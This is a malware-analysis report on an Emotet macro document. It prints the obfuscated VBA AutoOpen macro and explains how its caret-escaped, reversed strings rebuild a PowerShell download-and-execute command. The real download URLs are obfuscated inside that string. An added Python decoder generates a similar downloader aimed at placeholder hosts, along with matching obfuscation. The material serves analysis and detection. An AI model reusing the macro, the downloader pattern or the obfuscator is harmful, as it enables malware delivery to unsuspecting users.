MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Word document whose VBA project runs on open: the AutoOpen macro assembles a long command string and passes it to ATuJsIKo(), whose body falls past the preview cut-off and which, given the OLE_VBA_SHELL finding, is the likely home of the Shell() call. Apart from the junk If/Then blocks and the KeyString() calls that supply the first characters, the string is built from literals that spell out cmd /V/C"set xiRh=...&&for /L %D in (374,-1,0)do set o3W=!o3W!!xiRh:~%D,1!&&if %D==0 call %o3W:~-375%" once the ^ escape characters cmd.exe discards are removed. The value assigned to xiRh is the real payload stored backwards; the for /L loop copies it out one character at a time from index 374 down to 0, rebuilding it forwards in o3W, and call re-expands %o3W:~-375% to execute the result (the /V switch enables the delayed !var! expansion this relies on). Reversing the decoded value gives a PowerShell one-liner that creates a Net.WebClient, splits an '@'-separated list of five URLs, and for each one attempts DownloadFile to a .exe under $env:public followed by Invoke-Item, breaking on the first success while try/catch swallows failures. This caret-obfuscated, reversed cmd/PowerShell downloader is the classic Emotet maldoc pattern and matches the ClamAV signature Doc.Downloader.Emotet-6884070-0. Those five download URLs are the actionable indicators; the schema URL listed under Embedded URL below is not.
Heuristics (6)
- ClamAV: Doc.Downloader.Emotet-6884070-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-6884070-0
- VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this heuristic's canned wording ("no modern VBA project was recovered") is contradicted by the OLE_VBA_MACROS finding and by the extracted macros.bas below; treat the VBA findings as authoritative.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard OOXML DrawingML namespace URI found in benign Office files and is not a download or C2 indicator; the sample's actual download URLs are inside the macro's reversed string and were not surfaced by this extractor.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4523 bytes |
SHA-256 (macros.bas): 8f135abe046d30425e411997e5ba2dda07bfc358cf98854bfd9d61bb29c829a6
Preview of the extracted script (first 1,000 lines; the dump below is cut off before the body of ATuJsIKo):
Attribute VB_Name = "MhLpwtTs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
If hHZQmC < 14 Then
IwrKi = "PjTY"
End If
If zozOn = 17 Then
YSrdY = "QESVLG"
End If
If BajwB Or hjUsCP Then
IwWnfm = "JnAMtXBzVwrZUY"
End If
If icFOj < ooLsa Then
BQDHMk = "Ai"
End If
ATuJsIKo (KeyString(dCVjWYWk + QFziwhtl + 6 + 15 + 46 + kNiXXu + uVMJHiU) + hRiCiwh + TVWnRU + KeyString(FPXzIc + pXkGzPNK + 7 + 17 + 53 + UaKBO + KaJJGD) + TwQMj + GTqOMaN + ahQIw + ZmDdIGEz + wPNRUr)
If NZWEij Xor NWBcvO Then
IZNtj = "BhwNtG"
End If
End Sub
Attribute VB_Name = "IjWhFdpObUHT"
Function TwQMj()
BaqWlX = "d /V/C" + """" + "^s^e^t ^x^i" + "R^h=^ ^ ^ " + "^ ^ ^ ^ ^ ^ ^ ^" + " ^ ^ ^ ^ ^ ^ ^}^"
zuTiJI = "}^{hc^t^ac}^;^k^a^er" + "^b^;^L^D^l^" + "$^ m^e^t^I" + "^-^e^k^ovn" + "^I^;)^L^D^l^$^ " + "^,^b^En^$("
If HFMcKb <> 14 Then
dKzUa = "CBiBiokPf"
End If
If rZpSm <> fOIuua Then
nrsjqP = "Lfr"
End If
If HdoBj Eqv PBUGU Then
kjGVOY = "dbt"
End If
HThdrMA = "e^l^i^F^d^a^o^ln^w^o" + "^D^.^t^W^Q" + "^$^{^yr^t{)^w^j^" + "m^$ ni^ ^b^En$(" + "^hc^a^erof;^'e^xe"
If YPHFL <= dvKTmJ Then
QSNDC = "Fj"
End If
If QFOHE = 12 Then
sNCJkF = "GpZD"
End If
If btFkic <= vllmD Then
PUGRjH = "kOr"
End If
iBZjdzSiJoA = "^.^'^+^D^b^G^$^" + "+'^\^'^+c^" + "i^l^b^u^p^:vn^e^$^=" + "^L^D^l^$;^'^5^7^2^'^" + " ^=^ ^D^b^G^$^"
Fkjhpp = ";)^'^@^'(^t^il^p^S^." + "^'^W^o^Z^f^l/^m^o" + "c^.^s^ec^ivr^es^a"
aNVcYii = "^t^e^j//^:^p^tt^" + "h^@s^z/^l^p^." + "ce^iw^or^t^s^o^.^"
TwQMj = BaqWlX + zuTiJI + HThdrMA + iBZjdzSiJoA + Fkjhpp + aNVcYii
If aYzSGk >= nKFGN Then
CwXTEi = "ToO"
End If
If wFKIqd <> JQHETh Then
dIrWB = "LOEPl"
End If
If BQSQh > PqbdkJ Then
pzzHJ = "GTj"
End If
If vhzuTp <> 16 Then
hMlqU = "Pq"
End If
End Function
Function GTqOMaN()
YZUFqTXG = "kc^p//^:^p^t^t^" + "h^@^UR^L^y^" + "m^k^u/^moc^.t^av^" + "a^dr^i^h^k^in^k^e" + "t^lu^bna^t^si//^:^p"
If QHioQn = IDBVjW Then
jkVzi = "w"
End If
If zMCRPi < 18 Then
IbbWDN = "SbizA"
End If
If DMtjXq <= arkVjk Then
EqzsGj = "Gfb"
End If
If icrRhY Eqv bmHAz Then
asHkdP = "fbPzhKiiAv"
End If
PpEjwSIVuz = "^t^t^h@^pR^Th^e^We/^" + "m^oc^.^p^s^e^sr^" + "m^e^.^w^w^w//^:^p^" + "t^t^h@^W^j" + "r^o^L^D^z/m^oc^.n^ol"
If CcjbG And 4 Then
IvwkAs = "nivEzTYtDDfM"
End If
If oHJzQ Xor KVJvOw Then
nPbOL = "iidH"
End If
If Uomnk < hSUzq Then
NldbpT = "ApqhPwLPVzYBO"
End If
If QGjOpw = zjRFu Then
YXaUns = "UcUti"
End If
imztKVsIwhF = "^a^b^s^i^l" + "^ic^a^.^w^w^" + "w//^:^p^t^t^h^'^=^w^" + "j^m^$;^tn^e^i^lC^" + "b^e^W^.^t^eN^ "
If lMSww < XAzVRs Then
DqThl = "z"
End If
iJBcBD = "^tc^e^j^b^" + "o^-^w^en=tW^Q" + "^$^ ^l^l^eh" + "^sr^e^w^o^p&&^" + "for /^L %^D" + " ^in (^3^7"
If XKpwz > KAmGrG Then
CMwlaF = "tKVIOoLwVWtU"
End If
Kjbvj = "^4^,^-^1^,^0" + ")^d^o ^s^e^t ^o^3^" + "W=!^o^3^W!!^x^i" + "R^h:~%^D,1!&&"
tGZWDTiw = "^i^f %^D=^=^" + "0 c^a^l^l %^o^" + "3^W:^~^-^3^7^5%" + """" + " "
GTqOMaN = YZUFqTXG + PpEjwSIVuz + imztKVsIwhF + iJBcBD + Kjbvj + tGZWDTiw
If QMXwrH > nGAnC Then
iiwRw = "cjGW"
End If
If vizbz > 4 Then
vZqPa = "wAKuAIWMjni"
End If
If mJfaSn <= fmLwr Then
UoPWz = "LNohhIW"
End If
End Function
Function ahQIw()
If jhjwAI > IzrrhE Then
osFkm = "ElSoAnU"
End If
If MclzJ Or CcvYcL Then
irdhP = "I"
End If
MsXdPdil = ""
ahQIw = MsXdPdil
If wPrzMo And CjsPjn Then
kbuus = "RLhUZJ"
End If
If QZmhWX <> tNkWS Then
iNfvA = "RnUfTpQiT"
End If
If RJaGB Or uoaNcF Then
lssEr = "zFNO"
End If
If Euzdk > HHEqa Then
zAVZv = "c"
End If
If wczRs And 13 Then
RLptq = "ZlUadZpoJXV"
End If
End Function
Attribute VB_Name = "ukDWFBtHoEbIt"
Function ATuJsIKo(ZSYuRBD As String)
Const AYBCO = 868298775 - 868298775
If ILYfDF = iuplPt Then
slPcGw = "rnEKZUcv"
End I
... (truncated)
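The preview above shows the obfuscation but not the decoded command. The Python below is an added analyst example, not analyzer output or code from the sample: it evaluates VBA string-building functions the way the macro's concatenation does (the decoy assignments inside the If blocks are never referenced and drop out), strips the cmd.exe ^ escapes, and emulates the for /L reversal plus the final call %o3W:~-N% to recover the command and the URLs in it. Because the real sample's URLs are deliberately not reproduced here, the block generates its own input with obfuscate(), which writes a constructed payload of the same shape (Net.WebClient, '@'-split URL list, DownloadFile to a .exe under $env:public, Invoke-Item, break on first success) with reserved .invalid hostnames into VBA laid out like the extracted macro. The KeyString() helper that supplies the leading characters of the real command (presumably the "cm" of cmd) is not modelled; decode_fragment() is exercised on one literal pair copied verbatim from HThdrMA in TwQMj above. The cmd step is a semantic emulation of what cmd.exe ends up calling, not a cmd parser.

```python
"""Decode an Emotet-style VBA downloader: string fragments spread over junk-laden
functions, caret-escaped cmd.exe syntax, and the for /L loop that rebuilds the payload
reversed so `call %o3W:~-N%` can run it.  Added analyst tooling, not analyzer output.
The VBA it parses is generated below in the extracted macro's layout with .invalid
placeholder URLs; the cmd step emulates what cmd.exe ends up calling, it is not a parser."""
import re

STR_LIT = r'"(?:[^"]|"")*"'                    # VBA literal; "" is an escaped quote
TOKEN = re.compile(STR_LIT + r'|\w+')         # literals and identifiers of a + expression
FUNC = re.compile(r'(?:Function|Sub)\s+(\w+)\s*\([^)]*\)(.*?)End (?:Function|Sub)', re.S)


def vba_functions(src):
    """Map every Function/Sub name to its body text."""
    return {m.group(1): m.group(2) for m in FUNC.finditer(src)}


def eval_name(name, body, funcs, depth=0):
    """An identifier's value: a local `name = ...` in body, else the return value of the
    function of that name (VBA returns via `Name = ...` inside Name's own body), else ""."""
    local = re.search(r'^\s*' + re.escape(name) + r'\s*=\s*(.+?)\s*$', body, re.M)
    if local:
        return eval_expr(local.group(1), body, funcs, depth + 1)
    if name in funcs and funcs[name] != body:
        return eval_name(name, funcs[name], funcs, depth + 1)
    return ''


def eval_expr(expr, body, funcs, depth=0):
    """Concatenate `"lit" + var + OtherFunc`; decoys inside the If blocks are never referenced."""
    if depth > 50:
        return ''
    return ''.join(tok[1:-1].replace('""', '"') if tok.startswith('"')
                   else eval_name(tok, body, funcs, depth) for tok in TOKEN.findall(expr))


def strip_carets(s):
    """cmd.exe escape: ^X means X (so ^^ is a single caret)."""
    return re.sub(r'\^(.)', r'\1', s, flags=re.S)


def decode_fragment(vba_expr):
    """Un-escape and reverse literal fragments copied from the macro (they are stored backwards)."""
    return strip_carets(eval_expr(vba_expr, '', {}))[::-1]


REVERSE_LOOP = re.compile(
    r'set (\w+)=(.*?)&&for /L %(\w) in \((\d+),-1,0\)\s*do set (\w+)=!\5!!\1:~%\3,1!'
    r'&&if %\3==0 call %\5:~-(\d+)%', re.S)


def emulate_cmd(shell_arg):
    """From the Shell() argument cmd /V/C"...", return the command that `call` finally runs."""
    inner = shell_arg[shell_arg.index('"') + 1:shell_arg.rindex('"')]
    m = REVERSE_LOOP.search(strip_carets(inner))
    if not m:
        raise ValueError('reversal loop not found')
    value, start, tail = m.group(2), int(m.group(4)), int(m.group(6))
    rebuilt = value[:start + 1][::-1]    # the loop appends value[start], ..., value[0]
    return rebuilt[-tail:].rstrip()      # %o3W:~-tail%; the leading pad ends up as inert trailing spaces


def urls_in(command):
    return re.findall(r"https?://[^\s'\"@]+", command)


# Constructed stand-in for the real payload: same shape (Net.WebClient, '@'-separated URL
# list, DownloadFile to a .exe under $env:public, Invoke-Item, break on first success).
PAYLOAD = ("powershell $QWt=new-object Net.WebClient;"
           "$mjw='http://a.invalid/x@http://b.invalid/y'.Split('@');"
           "$lDl=$env:public+'\\275.exe';"
           "foreach($nEb in $mjw){try{$QWt.DownloadFile($nEb,$lDl);Invoke-Item $lDl;break}catch{}}")


def obfuscate(powershell, pad=6, chunk=14):
    """Produce (Shell argument, VBA source) the way the sample does, to exercise the decoder."""
    xirh = ' ' * pad + powershell[::-1]                 # reversed payload, space-padded
    n = len(xirh)
    car = lambda s: ''.join('^' + c for c in s)
    cmd = ('cmd /V/C"^s^e^t ^x^i^R^h=' + car(xirh) + '&&^f^o^r /^L %^D ^i^n (' + car(str(n - 1))
           + ',^-^1,^0)^d^o ^s^e^t ^o^3^W=!^o^3^W!!^x^i^R^h:~%^D,1!&&^i^f %^D=^=^0 ^c^a^l^l '
           '%^o^3^W:^~^-' + car(str(n)) + '%" ')
    lits = ['"%s"' % cmd[i:i + chunk].replace('"', '""') for i in range(0, len(cmd), chunk)]
    names, groups = [], []
    for i in range(0, len(lits), 3):                    # three literals per variable, junk between
        names.append('v%d' % (i // 3))
        groups.append(['If junk%d < 14 Then' % i, '    decoy%d = "noise"' % i, 'End If',
                       '%s = %s' % (names[-1], ' + '.join(lits[i:i + 3]))])
    half = len(groups) // 2

    def func(fname, gs, ns):
        return ['Function %s()' % fname] + sum(gs, []) + ['%s = %s' % (fname, ' + '.join(ns)), 'End Function']

    src = (func('PartA', groups[:half], names[:half]) + func('PartB', groups[half:], names[half:])
           + ['Function Tail()', 'Tail = ""', 'End Function'])
    return cmd, '\n'.join(src)


def recover(vba_src, shell_expr='PartA + PartB + Tail'):
    """VBA source plus the expression passed to Shell() -> (decoded command, URLs in it)."""
    command = emulate_cmd(eval_expr(shell_expr, '', vba_functions(vba_src)))
    return command, urls_in(command)


if __name__ == '__main__':
    command, urls = recover(obfuscate(PAYLOAD)[1])
    print(command)
    print(urls)
```

Running the block prints the recovered one-liner and its two placeholder URLs. Pointing recover() at the real macros.bas means passing the argument expression from AutoOpen as shell_expr and resolving KeyString(), whose body the preview truncates; decode_fragment() works on any literal pair from the dump as long as the pair does not end in a dangling ^ whose partner character sits in the next literal.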